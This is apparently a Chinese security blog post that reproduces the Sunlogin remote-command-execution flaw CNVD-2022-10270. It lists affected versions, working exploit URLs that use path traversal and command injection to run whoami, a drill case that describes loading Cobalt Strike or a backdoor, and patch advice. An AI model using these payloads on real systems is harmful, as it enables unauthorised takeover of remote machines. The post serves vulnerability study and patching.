向日葵远程命令执行漏洞(CNVD-2022-10270) 漏洞复现

举报
Vista_AX 发表于 2023/07/19 21:49:19 2023/07/19
【摘要】 向日葵远程命令执行漏洞(CNVD-2022-10270) 漏洞复现

01 漏洞描述


向日葵远程控制是一款面向企业和专业人员的远程pc管理和控制的服务软件。可以在任何有网络的情况下,轻松访问并控制安装了向日葵客户端的远程主机。同时还能实现远程文件传输、远程视频监控等功能,这不仅为用户的使用带来很多便捷,还能为其提供各类保障。

image.png

上海贝锐信息科技股份有限公司向日葵个人版for Windows存在命令执行漏洞,漏洞成因是在接口/check处,当参数cmd的值以ping或者nslookup开头时可以构造命令实现远程命令执行利用,客户端开启客户端会自动随机开启一个大于40000的端口号。

攻击者可精心构造恶意命令,利用该漏洞获取服务器控制权。


02 影响范围


向日葵个人版for Windows <= 11.0.0.33

向日葵简约版 <= V1.0.1.43315(2021.12)

03 利用方式


向日葵开启后,会对外开放一个端口,端口号随机

image.png


访问IP+port+cgi-bin/rpc?action=verify-haras,获取cookie值,例如浏览器访问http://xx.xx.xx.xx:xxxxx/cgi-bin/rpc?action=verify-haras

image.png


拿到cookie后,替换请求包Cookie并在get请求头添加payload1发送,可直接执行系统命令,如下图所示:

http://xx.xx.xx.xx:xxxxx/check?cmd=ping..%26c:%26%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2Fwhoami

image.png


若出现部分系统命令无法执行的情况,可以使用paylalod2

http://xx.xx.xx.xx:xxxxx/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+whoami

image.png



05 实战案例


某攻防演练中对IP进行端口扫描,发现某随机端口下为向日葵服务开启

image.png


访问url:cgi-bin/rpc?action=verify-haras获取向日葵凭证

image.png


执行whoami命令,发现为管理员权限

image.png

服务器上线CS方式一

CS服务器生成powershell载荷,利用漏洞利用工具执行Powershell命令上线cs

image.png

服务器上线CS方式二

VPS上传CS后门,利用向日葵RCE远程下载后门文件并执行

image.png


06 修复方案


1、目前厂商已发布了漏洞修复程序,请及时更新至最新版本,向日葵官方已发布了修复版本,请及时更新:https://sunlogin.oray.com/

2、设置白名单:如果目前无法升级,在业务环境允许的情况下,使用白名单限制web端口的访问来降低风险。

【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。